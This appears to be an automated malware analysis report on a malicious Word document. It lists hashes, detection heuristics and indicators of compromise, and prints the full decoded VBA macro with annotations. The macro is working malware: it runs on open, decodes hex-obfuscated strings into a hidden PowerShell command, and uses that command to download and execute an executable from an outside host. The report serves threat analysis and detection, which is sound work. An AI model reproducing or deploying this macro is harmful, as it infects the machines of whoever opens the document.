Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d55fd8d1187884d7…

MALICIOUS

Office (OLE)

102.5 KB Created: 2018-01-26 04:39:00 Authoring application: Microsoft Office Word First seen: 2018-05-18
MD5: ee622001f442803881c65b0f3581f2db SHA-1: 62a2c7e46039a3108f75e2071877fbff8589243a SHA-256: d55fd8d1187884d7a740eef6ff753f95e62a8f093ad9b6c336fc0d1c9b68aaa1
200 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic T1059.001 PowerShell T1105 Ingress Tool Transfer (the last two follow from the macro's decoded command line; see the summary below)

The sample is a Microsoft Word (OLE) document carrying a VBA macro that runs automatically when the document is opened with macros enabled (Document_Open, with a Workbook_Open alias that just calls it so the module also fires in an Excel host). The macro rebuilds a command line from four hex-string fragments (each two-digit byte minus 54) and launches it through a Kernel32!CreateProcessA declaration whose STARTUPINFO-shaped struct has the dwFlags slot set to 1 (consistent with STARTF_USESHOWWINDOW + SW_HIDE). Decoded, the command is a PowerShell downloader: it deletes any existing %APPDATA%\yh3c.exe, fetches hxxps://www[.]oxonetsecurity[.]com/natcomi.ml/1301294469.exe with System.Net.WebClient (User-Agent "USR-KL") to that path, runs the file via Shell.Application.ShellExecute, then kills its own PowerShell process — so the "secondary payload" suggested by the CreateProcess heuristic is a downloaded executable, not something embedded in the document. The CVE-2007-3899 attribution comes from a structural heuristic rated "likely", not from confirmed exploit code; the macro alone accounts for the observed behaviour, so treat the CVE as unconfirmed until the document structure is examined separately. Actionable indicators: the download URL, the drop path %APPDATA%\yh3c.exe, the User-Agent string USR-KL, and the decoded PowerShell command line.

Heuristics 8

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Downloader.Valyria-6666912-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6666912-0
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
Reference to CreateProcess API: the macro declares CreateProcessA from Kernel32 in both the VBA7 (64-bit) and legacy branches and calls it from LU_KKP with the decoded string as lpCommandLine (lpApplicationName NULL, bInheritHandles False, creation flags &H20 = NORMAL_PRIORITY_CLASS). The return value and the returned process/thread handles are never checked or closed.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    #End If
    Public Sub Document_Open()
        D_LSM
  • Workbook_Open macro low OLE_VBA_WBOPEN
Workbook_Open macro — in a Word document this handler is inert; it is an Excel-host fallback that simply calls Document_Open, so the same module auto-runs in either application.
    Matched line in script
    End Sub
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace used by Office markup and is not an indicator. The real network indicator (the payload download URL) is not present as plain text; it only appears after decoding the hex strings in the macro's SI_EQ function (see the summary above).

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4491 bytes
SHA-256: 2b38ea9fc025047301356b0fa53f71dd1b7720158b1cdf675e859aa26194423d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long encoded string blobs (AED_WR, CD_WLQ, Q_TEU, ZM_LOI). They are not base64: SI_EQ reads them as two-hex-digit byte pairs and subtracts 54 from each byte, yielding the PowerShell command line that LU_KKP passes to CreateProcessA.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ThisDocument module of the carved Word macro project (VB_Base = Normal.ThisDocument),
' i.e. the module whose Document_Open handler Word runs when macros are enabled.
Option Explicit

#If VBA7 Then

    ' VBA7 / 64-bit-capable branch.  Member names are randomised to defeat string
    ' scanning, but XBR_XTT's layout matches Win32 STARTUPINFO member for member:
    ' cb, three string pointers, eight DWORDs (the 12th member being dwFlags),
    ' two WORDs, then four pointer-sized members (lpReserved2, hStdInput/Output/Error).
    Private Type XBR_XTT
        PKN_NQ As Long
        EB_W As String
        HB_HY As String
        J_Z As String
        CZR_MG As Long
        XZ_VNN As Long
        I_W As Long
        LOQ_OW As Long
        UAL_ZZD As Long
        D_GHK As Long
        C_ZOW As Long
        N_W As Long                ' dwFlags slot; LU_KKP sets it to &H1 (STARTF_USESHOWWINDOW)
        PJ_VD As Integer           ' wShowWindow slot; never assigned, so 0 = SW_HIDE
        DN_PB As Integer
        EB_W2  As LongPtr
        Y_LR As LongPtr
        VI_QQO As LongPtr
        DKO_U As LongPtr
    End Type

    ' The only Win32 import in the module.  Parameter types are declared loosely
    ' (lpApplicationName as Long, the two SECURITY_ATTRIBUTES pointers and
    ' lpEnvironment As Any); the single caller (LU_KKP) passes 0&/zeroed structs for
    ' those, so only lpCommandLine, dwCreationFlags and the two struct refs matter.
    ' NOTE(review): the Declare precedes the TVM_FFT/Y_ULG type definitions it uses;
    ' that is legal in VBA because module-level types are resolved at compile time.
    Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal HZ_P As Long, ByVal NOV_E As String, A_MKQ As Any, Y_NI As Any, ByVal WVQ_MDV As Long, ByVal FX_VPE As Long, ByVal UV_OJ As Any, ByVal A_A As Long, EH_RCK As XBR_XTT, GN_M As Y_ULG) As LongPtr

    ' Layout matches SECURITY_ATTRIBUTES (nLength, lpSecurityDescriptor, bInheritHandle).
    Private Type TVM_FFT
        P_IQ As Long
        HB_R As LongPtr
            DV_F As Long
    End Type
    
    ' Layout matches PROCESS_INFORMATION (hProcess, hThread, dwProcessId, dwThreadId).
        Private Type Y_ULG
        T_KXE As LongPtr
            KOW_F As LongPtr
        FI_O As Long
        SI_AWW As Long
    End Type
#Else

    ' Legacy (32-bit, pre-VBA7) branch: same three structures with Long in place of
    ' LongPtr, and a non-PtrSafe Declare with stricter parameter types.
    Private Type XBR_XTT
        PKN_NQ As Long
        EB_W As String
        HB_HY As String
        J_Z As String
        CZR_MG As Long
        XZ_VNN As Long
        I_W As Long
        LOQ_OW As Long
        UAL_ZZD As Long
        D_GHK As Long
        C_ZOW As Long
        N_W As Long                ' dwFlags slot (see VBA7 branch)
        PJ_VD As Integer           ' wShowWindow slot, left 0 = SW_HIDE
        DN_PB As Integer
        EB_W2 As Long
        Y_LR As Long
        VI_QQO As Long
        DKO_U As Long
    End Type
        
    Private Declare Function CreateProcessA Lib "Kernel32" (ByVal HZ_P As Long, ByVal NOV_E As String, A_MKQ As TVM_FFT, Y_NI As TVM_FFT, ByVal WVQ_MDV As Long, ByVal FX_VPE As Long, ByVal UV_OJ As Long, ByVal A_A As Long, EH_RCK As XBR_XTT, GN_M As Y_ULG) As Long
    ' SECURITY_ATTRIBUTES-shaped.
    Private Type TVM_FFT
        P_IQ As Long
        HB_R As Long
        DV_F As Long
    End Type
    ' PROCESS_INFORMATION-shaped.
            Private Type Y_ULG
        T_KXE As Long
        KOW_F As Long
        FI_O As Long
        SI_AWW As Long
    End Type

#End If
' Auto-run entry point: Word fires this when the document is opened with macros
' enabled.  It does nothing itself and just forwards to D_LSM.
Public Sub Document_Open()
    Call D_LSM
End Sub
' Excel-host alias: if the same module is ever hosted in a workbook, this auto-run
' handler fires instead and delegates to Document_Open.
Sub Workbook_Open()
    Call Document_Open
End Sub
' Glue between the decoder and the launcher: build the command line with SI_EQ
' and hand it to LU_KKP.  LU_KKP's return value (always 1) is discarded.
Public Sub D_LSM()
    Call LU_KKP(SI_EQ())
End Sub
' Rebuilds the command line that LU_KKP launches.
'
' The four fragments are concatenated into one string of two-hex-digit bytes;
' each byte carries a +54 offset (e.g. "A6" -> &HA6 = 166 -> 166 - 54 = 112 = "p").
' Reviewer's own static decode of the table below (Windows-1252 host assumed;
' URL defanged, confirm in a sandbox):
'   powershell.exe -WindowStyle Hidden -noprofile
'   If (test-path  $env:APPDATA + '\yh3c.exe') {Remove-Item  $env:APPDATA + '\yh3c.exe'};
'   $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL';
'   $OEKQD.DownloadFile('hxxps://www[.]oxonetsecurity[.]com/natcomi.ml/1301294469.exe',
'                       $env:APPDATA + '\yh3c.exe');
'   (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\yh3c.exe');
'   Stop-Process -Id $Pid -Force
'
' Returns the decoded command line.  No side effects.
Public Function SI_EQ() As String
    Dim AED_WR As String
AED_WR = AED_WR + "A6A5AD9"
AED_WR = AED_WR + "BA8A99E"
AED_WR = AED_WR + "9BA2A26"
AED_WR = AED_WR + "49BAE9B"
AED_WR = AED_WR + "56638D9"
AED_WR = AED_WR + "FA49AA5"
AED_WR = AED_WR + "AD89AAA"
AED_WR = AED_WR + "FA29B56"
AED_WR = AED_WR + "7E9F9A9"
AED_WR = AED_WR + "A9BA456"
AED_WR = AED_WR + "63A4A5A"
AED_WR = AED_WR + "6A8A59C"
AED_WR = AED_WR + "9FA29B56"
AED_WR = AED_WR + "7F9C565EAA9BA9AA63A697AA9E56565A9BA4AC707786867A778A775661565D92AF9E6999649BAE9B5D5F56B1889BA3A5AC9B637FAA9BA356565A9BA4AC707786867A778A775661565D92AF9E6999649BAE9B5DB371565A857B81877A567356"
Dim CD_WLQ As String
CD_WLQ = "849BAD638598A09B99AA5689AFA9AA9BA364849BAA648D9B9879A29F9BA4AA71565A857B81877A647E9B979A9BA8A9915D8BA99BA863779D9BA4AA5D935673565D8B89886381825D71565A857B81877A647AA5ADA4A2A5979A7C9FA29B5E5D"
Dim Q_TEU As String
Q_TEU = "9EAAAAA6A9706565ADADAD64A5AEA5A49BAAA99B99ABA89FAAAF6499A5A365A497AA99A5A39F64A3A26567696667686F6A6A6C6F649BAE9B5D62565A9BA4AC707786867A778A775661565D92AF9E6999649BAE9B5D5F71565E849BAD638598"
Dim ZM_LOI As String
ZM_LOI = "A09B99AA566399A5A356899E9BA2A26477A6A6A29F9997AA9FA5A45F64899E9BA2A27BAE9B99ABAA9B5E5A9BA4AC707786867A778A775661565D92AF9E6999649BAE9B5D5F715689AAA5A66386A8A5999BA9A956637F9A565A869F9A56637CA5A8999B"
 Dim WD_H As String
  ' Fragment order is significant: AED_WR holds the interpreter and the
  ' cleanup/If-clause, CD_WLQ the WebClient setup, Q_TEU the URL and drop path,
  ' ZM_LOI the ShellExecute and self-termination tail.
  WD_H = AED_WR & CD_WLQ & Q_TEU & ZM_LOI

   Dim W_AID As Long
   Dim GZ_TM As String
   Dim JKA_BDA As String
   ' Walk the hex text two characters at a time.  "&H" & pair is a string such
   ' as "&HA6", which VBA coerces to the number 166 for Chr's numeric parameter;
   ' Chr then Asc round-trips the byte through the ANSI code page, so the decode
   ' relies on every value 128..255 mapping back to itself (true on Windows-1252).
   For W_AID = 1 To Len(WD_H) Step 2
        JKA_BDA = Chr("&H" & Mid(WD_H, W_AID, 2))
        GZ_TM = GZ_TM & Chr(Asc(JKA_BDA) - 54)   ' remove the +54 offset
   Next
   SI_EQ = GZ_TM
End Function
' Launches OJV_SY as a new process via CreateProcessA and always returns 1.
'
' Parameters:
'   OJV_SY - the full command line (lpCommandLine).  lpApplicationName is passed
'            as 0&, so the first token of the string is resolved through the
'            normal executable search path.
' Returns:
'   1 unconditionally; the CreateProcessA result (V) is never inspected.
' Notes:
'   - ME_U / UYG_MF are zero-initialised SECURITY_ATTRIBUTES-shaped structs and
'     bInheritHandles is False.
'   - Q_V.N_W, the dwFlags slot of the STARTUPINFO-shaped struct, is set to &H1
'     (STARTF_USESHOWWINDOW); the wShowWindow slot stays 0 (SW_HIDE), so the
'     child's main window is requested hidden.
'   - dwCreationFlags &H20& = NORMAL_PRIORITY_CLASS; lpEnvironment and
'     lpCurrentDirectory are both 0& (NULL).
'   - The handles CreateProcessA writes into AHQ_OE are never closed (leaked),
'     and failure to start the process is silently ignored.
Public Function LU_KKP(ByVal OJV_SY As String)
    Dim ME_U As TVM_FFT
    Dim UYG_MF As TVM_FFT
    Dim Q_V As XBR_XTT
    Q_V.N_W = &H1&
    Dim AHQ_OE As Y_ULG
#If VBA7 Then
    Dim V As LongPtr
#Else
    Dim V As Long
#End If
    V = CreateProcessA(0&, OJV_SY, ME_U, UYG_MF, False, &H20&, 0&, 0&, Q_V, AHQ_OE)
    LU_KKP = 1
End Function